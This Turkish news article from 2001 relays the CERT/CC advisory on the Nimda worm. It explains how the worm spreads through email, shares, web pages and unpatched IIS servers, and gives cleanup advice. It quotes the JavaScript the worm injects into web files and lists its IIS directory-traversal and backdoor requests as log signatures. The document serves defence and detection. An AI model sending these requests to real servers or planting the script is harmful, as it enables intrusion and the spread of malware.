URL: http://www.olympos.org/article/articleprint/362/-1/8/yeni_bir_kurtcuk_worm_nimda_yuksek_risk
|
Yeni bir kurtçuk (worm) NIMDA (Yüksek Risk)
|
|
Ana sayfa
Haberler
Virüs Haberleri
|
Yazar: Ertan Kurt
|
Yayınlanma tarihi: 19.09.2001 07:09
|
----------=[ Etkilenen Sistemler ]=----------
Microsoft Windows 95, 98, ME, NT, and 2000
----------=[ Açıklama ]=----------
CERT/CC 'W32/Nimda worm' veya 'Concept Virus (CV) v.5.' olarak bilinen yeni bir kötü amaçlı kod hakkında raporlar almaya başladı. Bu truva kurtçuğu yayılmak için çeşitli metodlar kullanıyor:
* eposta ile istemciden istemciye
* açık ağ paylaşımları ile istemciden istemciye
* etkilenmiş web sitelerini görüntüleme ile web sunucudan istemciye
* 'Microsoft IIS 4.0 / 5.0 directory traversal' güvenlik açığı tarayıp kullanarak istemciden web sunucuya
* Code Red II veya sadmind/IIS kurtçukları tarafından bırakılan arka kapıları tarayarak istemciden web sunucuya ilk analizlere göre kurtçuğun web içeriğini değiştirip kendi yayılmasını gerçekleştirmek dışında bir zarar verici özelliği yok. CERT/CC ayrıca ağ tarama ve eposta yayılma işlemleri sonucunda oluşan DoS (denial of service) tehditi ile ilgilide raporlar aldı.
Nimda kurtçuğu hem Windows 95, 98, ME, NT, veya 2000 çalıştıran kullanıcı işistasyonlari (istemciler) için hemde Windows NT ve 2000 çalıştıran sunucular için bir tehdit oluşturuyor.
Eposta ile yayılma
Bu kurtçuk iki bölümden oluşan bir MIME 'multipart/alternative' mesaj ile eposta yoluyla yayılıyor. ilk bölüm MIME tipi 'text/html' olarak tanımlanmış fakat text içermiyor ve bu sebeple epostanın içeriği yok gibi görünüyor. ikinci bölüm MIME tipi 'audio/x-wav' olarak tanımlanmış fakat 'readme.exe' isminde base64-encoded çalıştırılabilir bir ek dosya içeriyor.
CA-2001-06.html da tanımlanan (Automatic Execution of Embedded MIME Types) güvenlik açığına göre HTML postayı görüntülemek için Microsoft Internet Explorer 5.5 SP1 veya öncesini (IE 5.01 SP2 hariç) kullanan X86 platform üzerinde çalışan her posta yazılımı ilişikteki ek dosyayı otomatik olarak çalıştırıyor ve sonuç olarak makineye solucanı bulaştırıyor. Böylece, etkilenen konfigürasyonlarda, kurtçuğun aktif olması sadece bu eposta mesajını açmakla (veya önizleme yapmakla) sağlanabiliyor. Aktif hale geçmesi çalıştırılabilir bir dosya olan ek dosyayı çalıştırmaklada mümkün.
Nimda kurtçuğunu gönderen eposta mesajının aynı zamanda aşağıdaki karakteristiklere sahip olduğu gözlemlendi:
Mesajın konu başlığındaki yazı bir değişken gibi görünüyor fakat şimdiye kadar görülenler 80 karakterin üzerinde.
Ekteki çalıştırılabilir dosyanın çok çeşitleri olduğu görülüyor ve farklı mesajlardaki farklı ek dosyaların farklı MD5 checksum larının olmasına sebep oluyor. Fakat, ek dosyanın boyutu sabit olarak 57344 byte oluyor.
İşlevleri
Etkilenen istemci makineleri Nimda kurtçuğunun kopyalarını windows adres defterinde bulunan herkese eposta ile gönderiyor.
Aynı zamanda, istemci makineler etkilenen IIS sunucularını aramaya başlıyorlar. Nimda önceki IIS kurtçukları Code Red II ve sadmind/IIS tarafından bırakılan arkakapıları (backdoor) arıyor. Ayrıca IIS dizin atlama/geçme (directory traversal) açığını deniyor. Potansiyel hedef IP adresleri aşağıdaki tahmine göre seçiliyor:
zamanın %50 si, ilk iki octet`i aynı olan adresler
zamanın %25`i, ilk octet`i aynı olan adresler
zamanın %25`i rastgele bir adres seçiliyor.
Etkilenen istemci makine tarayıp bulduğu etkilenen sunucuya Nimda kodunun bir kopyasını transfer ediyor. Sunucu makinede çalıştığında solucan sistemdeki (dosya paylaşımları ile erişilebilenler dahil) tüm dizinleri geçiyor ve kendisinin bir kopyasını diske 'README.EML' ismi ile kaydediyor. Web içerikli bir dizin (ör. HTML veya ASP dosyaları) bulduğunda, söz konusu dosyaların hepsine aşağıdaki Javascript kodunu ekliyor:
<script language='JavaScript'>
window.open('readme.eml', null, 'resizable=no,top=6000,left=6000')</script>
|
-----------
Sisteminizi http://housecall.olympos.org adresinde online virüs taramasından geçirebilirsiniz.
-----------
Bu web içeriği değiştirme web browser ile veya ağ dosya sistemine gözatma ile yeni istemcilere de yayılabiliyor.
Browser ile yayılma
Bulaşma işleminin bir parçası olarak Nimda solucanı bulduğu tüm web içeriklerini değiştiriyor. Ve bunun sonucunda sistemdeki web içeriğine bir web tarayıcı ile yada dosya sistemi ile gözatan her kullanıcı solucanın bir kopyasını edinmiş oluyor. Bazı tarayıcılar indirilen kopyayı otomatik olarak çalıştırabilir ve böylece etkilenebilir.
Dosya sistemi ile yayılma
Nimda kurtçuğu (README.EML ismini kullanarak) kullanıcının erişim izni olan tüm yazılabilir dizinlerde kendisinin pek çok kopyasını yaratıyor. Başka bir sistemdeki kullanıcı paylaşılan bir ağ sürücüsünde solucanın kopyasını önizleme seçeneği aktif olan bir Windows Explorer ile seçerse, solucan o sistemide etkiliyor.
Sistem izleri
Nimda kurtçuğunun tarama aktivitesi port 80`i dinleyen tüm web sunucularda aşağıdaki log girişlerini yaratıyor:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c/winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c/..%5c/..%5c/winnt/system32
/cmd.exe?/c+dir
GET /msadc/..%5c/..%5c/..%5c/..\xc1\x1c/..\xc1\x1c/..
\xc1\x1c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0//winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf/winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f/winnt/system32/cmd.exe?/c+dir
Not: Ayrıca admin.dll istemleride yapıyor. Logdaki ilk 4 satır Code Red II tarafından açılmış arkakapıya bağlanma denemelerini gösteriyor. Geri kalanlar Dizin Geçme (Directory Traversal) açığı denemeleri.
Saldırganlar yamalar uygulanmamış IIS sunucularda YerelSistem (LocalSystem) güvenlik haklarıyla istenilen komutları çalıştırabilirler. Etkilenen sistemler diğer internet sitelerine gerçekleştirilen saldırılarda yer alma riskini taşıyor. Nimda kurtçuğunun yüksek tarama oranı etkilenen makinelerin bulunduğu ağlarda bantgenişliği denial-of-service durumlarınada yol açıyor.
----------=[ Korunma ]=----------
IIS makinelerin sistem yöneticileri için tavsiyeler:
Sisteminizin etkilenip etkilenmediğine karar vermek için aşağıdakilere bakın:
root.exe dosyası (Code Red II veya sadmind/IIS kurtçukları tarafindan etkilendigini belirtir ve sistemin Nimda kurtçuğundan da etkilenmesini sağlar)
web içeriği olan dizinlerde admin.dll dosyası veya beklenmeyen .eml dosyaları (nimda bulaştığını gösterir).
Etkilenen sistemin en güvenli temizleme sistem sürücülerinin formatlanması ve sistem yazılımının güvenilir bir kaynaktan (üretici firma tarafından sağlanan CD-ROM gibi) tekrar kurulmasıdır. Ek olarak yazılım kurulduktan sonra üretici firma tarafından sağlanan tüm yamalar kurulmalı. Bu işlemlerin sistem ağa bağlı değilken yapılması tavsiye olunur. Fakat tüm ağ servisleri dikkatli bir şekilde kapatılırsa yamalar internet`tende indirilip kurulabilir.
Üretici firma tarafından sağlanan tüm yamaları kurun
Nimda kurtçuğunun kullandığı tüm IIS açıklarını kapatan toplu yama Microsoft`tan temin edilebilir:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
Son kullanıcılar için tavsiyeler:
Üretici firma tarafından sağlanan tüm yamaları kurun
Internet Explorer`in etkilenen bir sürümünü kullanıyorsanız, CERT/CC aşağıdaki adresten 'Autmatic Execution of Embedded MIME Types' güvenlik açığı için Microsoft tarafından sağlanan yamayı kurmanızı tavsiye ediyor
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Bir antivirüs çözümü kullanın
Kullanıcıların antivirüs yazılımlarını güncellemeleri önemli. Pek çok antivirüs yazılımı üretici firma bu açıklar için bilgi, araç ve güncelleme hazırladı.
Eposta ile gelen ek dosyaları açmayın
Nimda kurtçuğu 'readme.exe' isminde bir ek dosya ile gelebilir. Kullanıcılar bu ek dosyayı açmamalılar.
JavaScript`i kapatın
Son kullanıcı sistemleri etkilenen sunucular tarafından host edilen web sitelerini gezerek Nimda wormdan etkilenebiliyor. Bu tip bir bulaşma Javascript gerektiriyor. Bu sebeple CERT/CC son kullanıcıların JavaScript`i kapatmalarını tavsiye ediyor.
-----------
Sisteminizi http://housecall.olympos.org adresinde online virüs taramasından geçirebilirsiniz.
-----------
Antivirüs Üretici firma bilgileri
Trend Micro
http://www.antivirus.com/vinfo/virusencyclo/
default5.asp?VName=TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
Central Command, Inc.
http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?
p_refno=010918-000005
Command Software Systems
http://www.commandsoftware.com/virus/nimda.html
Data Fellows Corp
http://www.datafellows.com/v-descs/nimda.shtml
McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=99209&
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
Ref: http://www.cert.org/advisories/CA-2001-26.html
http://www.cert.org/other_sources/viruses.html